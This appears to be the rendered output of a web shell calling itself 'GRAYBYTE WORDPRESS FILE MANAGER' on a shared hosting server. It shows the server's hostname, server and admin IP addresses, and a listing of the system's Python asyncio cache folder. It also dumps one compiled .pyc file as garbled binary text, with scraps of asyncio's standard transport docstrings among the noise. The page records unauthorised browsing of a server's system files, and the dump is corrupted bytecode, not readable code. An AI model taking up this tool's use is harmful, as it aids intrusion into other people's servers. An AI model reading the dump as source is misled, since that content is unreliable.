$51 GRAYBYTE WORDPRESS FILE MANAGER $26

SERVER : premium201.web-hosting.com #1 SMP Wed Mar 26 12:08:09 UTC 2025
SERVER IP : 172.67.162.162 | ADMIN IP 216.73.216.51
OPTIONS : CRL = ON | WGT = ON | SDO = OFF | PKEX = OFF
DEACTIVATED : NONE

/usr/lib64/python3.12/asyncio/__pycache__/

HOME
Current File : /usr/lib64/python3.12/asyncio/__pycache__//transports.cpython-312.pyc
�

�֦i�)���dZdZGd�d�ZGd�de�ZGd�de�ZGd�d	ee�ZGd
�de�ZGd�d
e�ZGd�de�Zy)zAbstract Transport class.)�
BaseTransport�
ReadTransport�WriteTransport�	Transport�DatagramTransport�SubprocessTransportc�<�eZdZdZdZd
d�Zd
d�Zd�Zd�Zd�Z	d	�Z
y)rzBase class for transports.��_extraNc��|�i}||_y�Nr	)�self�extras  �+/usr/lib64/python3.12/asyncio/transports.py�__init__zBaseTransport.__init__s���=��E����c�:�|jj||�S)z#Get optional transport information.)r
�get)r
�name�defaults   r�get_extra_infozBaseTransport.get_extra_infos���{�{���t�W�-�-rc��t�)z2Return True if the transport is closing or closed.��NotImplementedError�r
s r�
is_closingzBaseTransport.is_closing���!�!rc��t�)aClose the transport.

        Buffered data will be flushed asynchronously.  No more data
        will be received.  After all buffered data is flushed, the
        protocol's connection_lost() method will (eventually) be
        called with None as its argument.
        rrs r�closezBaseTransport.close�
��"�!rc��t�)zSet a new protocol.r)r
�protocols  r�set_protocolzBaseTransport.set_protocol%rrc��t�)zReturn the current protocol.rrs r�get_protocolzBaseTransport.get_protocol)rrr)�__name__�
__module__�__qualname__�__doc__�	__slots__rrrrr"r$�rrrr	s(��$��I��
.�"�"�"�"rrc�&�eZdZdZdZd�Zd�Zd�Zy)rz#Interface for read-only transports.r*c��t�)z*Return True if the transport is receiving.rrs r�
is_readingzReadTransport.is_reading3rrc��t�)z�Pause the receiving end.

        No data will be passed to the protocol's data_received()
        method until resume_reading() is called.
        rrs r�
pause_readingzReadTransport.pause_reading7�
��"�!rc��t�)z�Resume the receiving end.

        Data received will once again be passed to the protocol's
        data_received() method.
        rrs r�resume_readingzReadTransport.resume_reading?r0rN)r%r&r'r(r)r-r/r2r*rrrr.s��-��I�"�"�"rrc�F�eZdZdZdZdd�Zd�Zd�Zd�Zd�Z	d	�Z
d
�Zd�Zy)
rz$Interface for write-only transports.r*Nc��t�)a�Set the high- and low-water limits for write flow control.

        These two values control when to call the protocol's
        pause_writing() and resume_writing() methods.  If specified,
        the low-water limit must be less than or equal to the
        high-water limit.  Neither value can be negative.

        The defaults are implementation-specific.  If only the
        high-water limit is given, the low-water limit defaults to an
        implementation-specific value less than or equal to the
        high-water limit.  Setting high to zero forces low to zero as
        well, and causes pause_writing() to be called whenever the
        buffer becomes non-empty.  Setting low to zero causes
        resume_writing() to be called only once the buffer is empty.
        Use of zero for either limit is generally sub-optimal as it
        reduces opportunities for doing I/O and computation
        concurrently.
        r�r
�high�lows   r�set_write_buffer_limitsz&WriteTransport.set_write_buffer_limitsMs
��&"�!rc��t�)z,Return the current size of the write buffer.rrs r�get_write_buffer_sizez$WriteTransport.get_write_buffer_sizebrrc��t�)z�Get the high and low watermarks for write flow control.
        Return a tuple (low, high) where low and high are
        positive number of bytes.rrs r�get_write_buffer_limitsz&WriteTransport.get_write_buffer_limitsfs
��"�!rc��t�)z�Write some data bytes to the transport.

        This does not block; it buffers the data and arranges for it
        to be sent out asynchronously.
        r)r
�datas  r�writezWriteTransport.writelr0rc�H�dj|�}|j|�y)z�Write a list (or any iterable) of data bytes to the transport.

        The default implementation concatenates the arguments and
        calls write() on the result.
        rN)�joinr?)r
�list_of_datar>s   r�
writelineszWriteTransport.writelinests���x�x��%���
�
�4�rc��t�)z�Close the write end after flushing buffered data.

        (This is like typing ^D into a UNIX program reading from stdin.)

        Data may still be received.
        rrs r�	write_eofzWriteTransport.write_eof}�
��"�!rc��t�)zAReturn True if this transport supports write_eof(), False if not.rrs r�
can_write_eofzWriteTransport.can_write_eof�rrc��t��z�Close the transport immediately.

        Buffered data will be lost.  No more data will be received.
        The protocol's connection_lost() method will (eventually) be
        called with None as its argument.
        rrs r�abortzWriteTransport.abort�rFr�NN)
r%r&r'r(r)r8r:r<r?rCrErHrKr*rrrrHs2��.��I�"�*"�"�"��"�"�"rrc��eZdZdZdZy)raSInterface representing a bidirectional transport.

    There may be several implementations, but typically, the user does
    not implement new transports; rather, the platform provides some
    useful transports that are implemented using the platform's best
    practices.

    The user never instantiates a transport directly; they call a
    utility function, passing it a protocol factory and other
    information necessary to create the transport and protocol.  (E.g.
    EventLoop.create_connection() or EventLoop.create_server().)

    The utility function will asynchronously create a transport and a
    protocol and hook them up by calling the protocol's
    connection_made() method, passing it the transport.

    The implementation here raises NotImplemented for every method
    except writelines(), which calls write() in a loop.
    r*N)r%r&r'r(r)r*rrrr�s���(�Irrc�"�eZdZdZdZdd�Zd�Zy)rz(Interface for datagram (UDP) transports.r*Nc��t�)aSend data to the transport.

        This does not block; it buffers the data and arranges for it
        to be sent out asynchronously.
        addr is target socket address.
        If addr is None use target address pointed on transport creation.
        r)r
r>�addrs   r�sendtozDatagramTransport.sendto�rrc��t�rJrrs rrKzDatagramTransport.abort�rFrr)r%r&r'r(r)rQrKr*rrrr�s��2��I�"�"rrc�4�eZdZdZd�Zd�Zd�Zd�Zd�Zd�Z	y)	rr*c��t�)zGet subprocess id.rrs r�get_pidzSubprocessTransport.get_pid�rrc��t�)z�Get subprocess returncode.

        See also
        http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
        rrs r�get_returncodez"SubprocessTransport.get_returncode�r0rc��t�)z&Get transport for pipe with number fd.r)r
�fds  r�get_pipe_transportz&SubprocessTransport.get_pipe_transport�rrc��t�)z�Send signal to subprocess.

        See also:
        docs.python.org/3/library/subprocess#subprocess.Popen.send_signal
        r)r
�signals  r�send_signalzSubprocessTransport.send_signal�r0rc��t�)aLStop the subprocess.

        Alias for close() method.

        On Posix OSs the method sends SIGTERM to the subprocess.
        On Windows the Win32 API function TerminateProcess()
         is called to stop the subprocess.

        See also:
        http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
        rrs r�	terminatezSubprocessTransport.terminate�s
��"�!rc��t�)z�Kill the subprocess.

        On Posix OSs the function sends SIGKILL to the subprocess.
        On Windows kill() is an alias for terminate().

        See also:
        http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
        rrs r�killzSubprocessTransport.kill�s
��"�!rN)
r%r&r'r)rUrWrZr]r_rar*rrrr�s%���I�"�"�"�"�"�	"rrc�P��eZdZdZdZd
�fd�	Zd�Zd�Zd�Zd
d�Z	d
d�Z
d	�Z�xZS)�_FlowControlMixinavAll the logic for (write) flow control in a mix-in base class.

    The subclass must implement get_write_buffer_size().  It must call
    _maybe_pause_protocol() whenever the write buffer size increases,
    and _maybe_resume_protocol() whenever it decreases.  It may also
    override set_write_buffer_limits() (e.g. to specify different
    defaults).

    The subclass constructor must call super().__init__(extra).  This
    will call set_write_buffer_limits().

    The user may call set_write_buffer_limits() and
    get_write_buffer_size(), and their protocol's pause_writing() and
    resume_writing() may be called.
    )�_loop�_protocol_paused�_high_water�
_low_waterc�h��t�|�|�|�J�||_d|_|j	�y)NF)�superrrdre�_set_write_buffer_limits)r
r�loop�	__class__s   �rrz_FlowControlMixin.__init__s7���
�����������
� %����%�%�'rc�@�|j�}||jkry|js#d|_	|jj	�yy#t
tf$r�t$r4}|jjd|||jd��Yd}~yd}~wwxYw)NTzprotocol.pause_writing() failed��message�	exception�	transportr!)
r:rfre�	_protocol�
pause_writing�
SystemExit�KeyboardInterrupt�
BaseExceptionrd�call_exception_handler)r
�size�excs   r�_maybe_pause_protocolz'_FlowControlMixin._maybe_pause_protocols����)�)�+���4�#�#�#���$�$�$(�D�!�

����,�,�.�%��� 1�2�
�� �
��
�
�1�1�@�!$�!%� $���	3����
�s�A�B�)*B�Bc�<�|jrA|j�|jkr#d|_	|jj	�yyy#t
tf$r�t$r4}|jjd|||jd��Yd}~yd}~wwxYw)NFz protocol.resume_writing() failedrn)
rer:rgrr�resume_writingrtrurvrdrw)r
rys  r�_maybe_resume_protocolz(_FlowControlMixin._maybe_resume_protocol's����!�!��*�*�,����?�$)�D�!�

����-�-�/�@�
"��
� 1�2�
�� �
��
�
�1�1�A�!$�!%� $���	3����
�s�A�B�'*B�Bc�2�|j|jfSr)rgrfrs rr<z)_FlowControlMixin.get_write_buffer_limits7s������!1�!1�2�2rc��|�
|�d}nd|z}|�|dz}||cxk\rdk\sntd|�d|�d���||_||_y)Ni��zhigh (z) must be >= low (z) must be >= 0)�
ValueErrorrfrgr5s   rrjz*_FlowControlMixin._set_write_buffer_limits:sh���<��{� ���3�w���;��!�)�C��s��a������ 2�3�'��H�J�
J� �����rc�J�|j||��|j�y)N)r6r7)rjrzr5s   rr8z)_FlowControlMixin.set_write_buffer_limitsJs!���%�%�4�S�%�9��"�"�$rc��t�rrrs rr:z'_FlowControlMixin.get_write_buffer_sizeNs��!�!rrL)
r%r&r'r(r)rrzr}r<rjr8r:�
__classcell__)rls@rrcrc�s3���� K�I�(��$� 3�� %�"rrcN)	r(�__all__rrrrrrrcr*rr�<module>r�sj�����""�""�J"�M�"�4I"�]�I"�X�
�~��0"�
�"�23"�-�3"�lT"�	�T"r

Current_dir [ NOT WRITEABLE ] Document_root [ WRITEABLE ]


[ Back ]
NAME
SIZE
LAST TOUCH
USER
CAN-I?
FUNCTIONS
..
--
26 May 2026 8.05 AM
root / root
0755
__init__.cpython-312.opt-1.pyc
1.425 KB
27 Apr 2026 4.36 PM
root / root
0644
__init__.cpython-312.opt-2.pyc
1.374 KB
27 Apr 2026 4.36 PM
root / root
0644
__init__.cpython-312.pyc
1.425 KB
27 Apr 2026 4.36 PM
root / root
0644
__main__.cpython-312.opt-1.pyc
5.329 KB
27 Apr 2026 4.36 PM
root / root
0644
__main__.cpython-312.opt-2.pyc
5.329 KB
27 Apr 2026 4.36 PM
root / root
0644
__main__.cpython-312.pyc
5.329 KB
27 Apr 2026 4.36 PM
root / root
0644
base_events.cpython-312.opt-1.pyc
84.614 KB
27 Apr 2026 4.36 PM
root / root
0644
base_events.cpython-312.opt-2.pyc
75.425 KB
27 Apr 2026 4.36 PM
root / root
0644
base_events.cpython-312.pyc
84.715 KB
27 Apr 2026 4.36 PM
root / root
0644
base_futures.cpython-312.opt-1.pyc
3.016 KB
27 Apr 2026 4.36 PM
root / root
0644
base_futures.cpython-312.opt-2.pyc
2.783 KB
27 Apr 2026 4.36 PM
root / root
0644
base_futures.cpython-312.pyc
3.016 KB
27 Apr 2026 4.36 PM
root / root
0644
base_subprocess.cpython-312.opt-1.pyc
15.503 KB
27 Apr 2026 4.36 PM
root / root
0644
base_subprocess.cpython-312.opt-2.pyc
15.412 KB
27 Apr 2026 4.36 PM
root / root
0644
base_subprocess.cpython-312.pyc
15.703 KB
27 Apr 2026 4.36 PM
root / root
0644
base_tasks.cpython-312.opt-1.pyc
3.984 KB
27 Apr 2026 4.36 PM
root / root
0644
base_tasks.cpython-312.opt-2.pyc
3.984 KB
27 Apr 2026 4.36 PM
root / root
0644
base_tasks.cpython-312.pyc
3.984 KB
27 Apr 2026 4.36 PM
root / root
0644
constants.cpython-312.opt-1.pyc
0.935 KB
27 Apr 2026 4.36 PM
root / root
0644
constants.cpython-312.opt-2.pyc
0.935 KB
27 Apr 2026 4.36 PM
root / root
0644
constants.cpython-312.pyc
0.935 KB
27 Apr 2026 4.36 PM
root / root
0644
coroutines.cpython-312.opt-1.pyc
3.639 KB
27 Apr 2026 4.36 PM
root / root
0644
coroutines.cpython-312.opt-2.pyc
3.553 KB
27 Apr 2026 4.36 PM
root / root
0644
coroutines.cpython-312.pyc
3.683 KB
27 Apr 2026 4.36 PM
root / root
0644
events.cpython-312.opt-1.pyc
35.883 KB
27 Apr 2026 4.36 PM
root / root
0644
events.cpython-312.opt-2.pyc
26.823 KB
27 Apr 2026 4.36 PM
root / root
0644
events.cpython-312.pyc
35.883 KB
27 Apr 2026 4.36 PM
root / root
0644
exceptions.cpython-312.opt-1.pyc
3.011 KB
27 Apr 2026 4.36 PM
root / root
0644
exceptions.cpython-312.opt-2.pyc
2.394 KB
27 Apr 2026 4.36 PM
root / root
0644
exceptions.cpython-312.pyc
3.011 KB
27 Apr 2026 4.36 PM
root / root
0644
format_helpers.cpython-312.opt-1.pyc
3.778 KB
27 Apr 2026 4.36 PM
root / root
0644
format_helpers.cpython-312.opt-2.pyc
3.555 KB
27 Apr 2026 4.36 PM
root / root
0644
format_helpers.cpython-312.pyc
3.778 KB
27 Apr 2026 4.36 PM
root / root
0644
futures.cpython-312.opt-1.pyc
16.551 KB
27 Apr 2026 4.36 PM
root / root
0644
futures.cpython-312.opt-2.pyc
13.251 KB
27 Apr 2026 4.36 PM
root / root
0644
futures.cpython-312.pyc
16.902 KB
27 Apr 2026 4.36 PM
root / root
0644
locks.cpython-312.opt-1.pyc
26.778 KB
27 Apr 2026 4.36 PM
root / root
0644
locks.cpython-312.opt-2.pyc
19.778 KB
27 Apr 2026 4.36 PM
root / root
0644
locks.cpython-312.pyc
26.778 KB
27 Apr 2026 4.36 PM
root / root
0644
log.cpython-312.opt-1.pyc
0.276 KB
27 Apr 2026 4.36 PM
root / root
0644
log.cpython-312.opt-2.pyc
0.242 KB
27 Apr 2026 4.36 PM
root / root
0644
log.cpython-312.pyc
0.276 KB
27 Apr 2026 4.36 PM
root / root
0644
mixins.cpython-312.opt-1.pyc
1.006 KB
27 Apr 2026 4.36 PM
root / root
0644
mixins.cpython-312.opt-2.pyc
0.976 KB
27 Apr 2026 4.36 PM
root / root
0644
mixins.cpython-312.pyc
1.006 KB
27 Apr 2026 4.36 PM
root / root
0644
proactor_events.cpython-312.opt-1.pyc
43.01 KB
27 Apr 2026 4.36 PM
root / root
0644
proactor_events.cpython-312.opt-2.pyc
42.643 KB
27 Apr 2026 4.36 PM
root / root
0644
proactor_events.cpython-312.pyc
43.699 KB
27 Apr 2026 4.36 PM
root / root
0644
protocols.cpython-312.opt-1.pyc
8.578 KB
27 Apr 2026 4.36 PM
root / root
0644
protocols.cpython-312.opt-2.pyc
3.683 KB
27 Apr 2026 4.36 PM
root / root
0644
protocols.cpython-312.pyc
8.578 KB
27 Apr 2026 4.36 PM
root / root
0644
queues.cpython-312.opt-1.pyc
11.663 KB
27 Apr 2026 4.36 PM
root / root
0644
queues.cpython-312.opt-2.pyc
9.125 KB
27 Apr 2026 4.36 PM
root / root
0644
queues.cpython-312.pyc
11.663 KB
27 Apr 2026 4.36 PM
root / root
0644
runners.cpython-312.opt-1.pyc
9.758 KB
27 Apr 2026 4.36 PM
root / root
0644
runners.cpython-312.opt-2.pyc
7.916 KB
27 Apr 2026 4.36 PM
root / root
0644
runners.cpython-312.pyc
9.758 KB
27 Apr 2026 4.36 PM
root / root
0644
selector_events.cpython-312.opt-1.pyc
61.701 KB
27 Apr 2026 4.36 PM
root / root
0644
selector_events.cpython-312.opt-2.pyc
59.739 KB
27 Apr 2026 4.36 PM
root / root
0644
selector_events.cpython-312.pyc
61.836 KB
27 Apr 2026 4.36 PM
root / root
0644
sslproto.cpython-312.opt-1.pyc
40.828 KB
27 Apr 2026 4.36 PM
root / root
0644
sslproto.cpython-312.opt-2.pyc
36.979 KB
27 Apr 2026 4.36 PM
root / root
0644
sslproto.cpython-312.pyc
40.912 KB
27 Apr 2026 4.36 PM
root / root
0644
staggered.cpython-312.opt-1.pyc
6.248 KB
27 Apr 2026 4.36 PM
root / root
0644
staggered.cpython-312.opt-2.pyc
4.176 KB
27 Apr 2026 4.36 PM
root / root
0644
staggered.cpython-312.pyc
6.396 KB
27 Apr 2026 4.36 PM
root / root
0644
streams.cpython-312.opt-1.pyc
32.185 KB
27 Apr 2026 4.36 PM
root / root
0644
streams.cpython-312.opt-2.pyc
26.533 KB
27 Apr 2026 4.36 PM
root / root
0644
streams.cpython-312.pyc
32.586 KB
27 Apr 2026 4.36 PM
root / root
0644
subprocess.cpython-312.opt-1.pyc
11.79 KB
27 Apr 2026 4.36 PM
root / root
0644
subprocess.cpython-312.opt-2.pyc
11.674 KB
27 Apr 2026 4.36 PM
root / root
0644
subprocess.cpython-312.pyc
11.813 KB
27 Apr 2026 4.36 PM
root / root
0644
taskgroups.cpython-312.opt-1.pyc
8.151 KB
27 Apr 2026 4.36 PM
root / root
0644
taskgroups.cpython-312.opt-2.pyc
7.49 KB
27 Apr 2026 4.36 PM
root / root
0644
taskgroups.cpython-312.pyc
8.246 KB
27 Apr 2026 4.36 PM
root / root
0644
tasks.cpython-312.opt-1.pyc
39.244 KB
27 Apr 2026 4.36 PM
root / root
0644
tasks.cpython-312.opt-2.pyc
30.649 KB
27 Apr 2026 4.36 PM
root / root
0644
tasks.cpython-312.pyc
39.367 KB
27 Apr 2026 4.36 PM
root / root
0644
threads.cpython-312.opt-1.pyc
1.23 KB
27 Apr 2026 4.36 PM
root / root
0644
threads.cpython-312.opt-2.pyc
0.786 KB
27 Apr 2026 4.36 PM
root / root
0644
threads.cpython-312.pyc
1.23 KB
27 Apr 2026 4.36 PM
root / root
0644
timeouts.cpython-312.opt-1.pyc
7.411 KB
27 Apr 2026 4.36 PM
root / root
0644
timeouts.cpython-312.opt-2.pyc
5.853 KB
27 Apr 2026 4.36 PM
root / root
0644
timeouts.cpython-312.pyc
7.616 KB
27 Apr 2026 4.36 PM
root / root
0644
transports.cpython-312.opt-1.pyc
13.658 KB
27 Apr 2026 4.36 PM
root / root
0644
transports.cpython-312.opt-2.pyc
8.455 KB
27 Apr 2026 4.36 PM
root / root
0644
transports.cpython-312.pyc
13.678 KB
27 Apr 2026 4.36 PM
root / root
0644
trsock.cpython-312.opt-1.pyc
4.962 KB
27 Apr 2026 4.36 PM
root / root
0644
trsock.cpython-312.opt-2.pyc
4.716 KB
27 Apr 2026 4.36 PM
root / root
0644
trsock.cpython-312.pyc
4.962 KB
27 Apr 2026 4.36 PM
root / root
0644
unix_events.cpython-312.opt-1.pyc
65.472 KB
27 Apr 2026 4.36 PM
root / root
0644
unix_events.cpython-312.opt-2.pyc
60.543 KB
27 Apr 2026 4.36 PM
root / root
0644
unix_events.cpython-312.pyc
66.143 KB
27 Apr 2026 4.36 PM
root / root
0644
windows_events.cpython-312.opt-1.pyc
40.507 KB
27 Apr 2026 4.36 PM
root / root
0644
windows_events.cpython-312.opt-2.pyc
39.467 KB
27 Apr 2026 4.36 PM
root / root
0644
windows_events.cpython-312.pyc
40.552 KB
27 Apr 2026 4.36 PM
root / root
0644
windows_utils.cpython-312.opt-1.pyc
7.011 KB
27 Apr 2026 4.36 PM
root / root
0644
windows_utils.cpython-312.opt-2.pyc
6.604 KB
27 Apr 2026 4.36 PM
root / root
0644
windows_utils.cpython-312.pyc
7.163 KB
27 Apr 2026 4.36 PM
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME
Static GIF Static GIF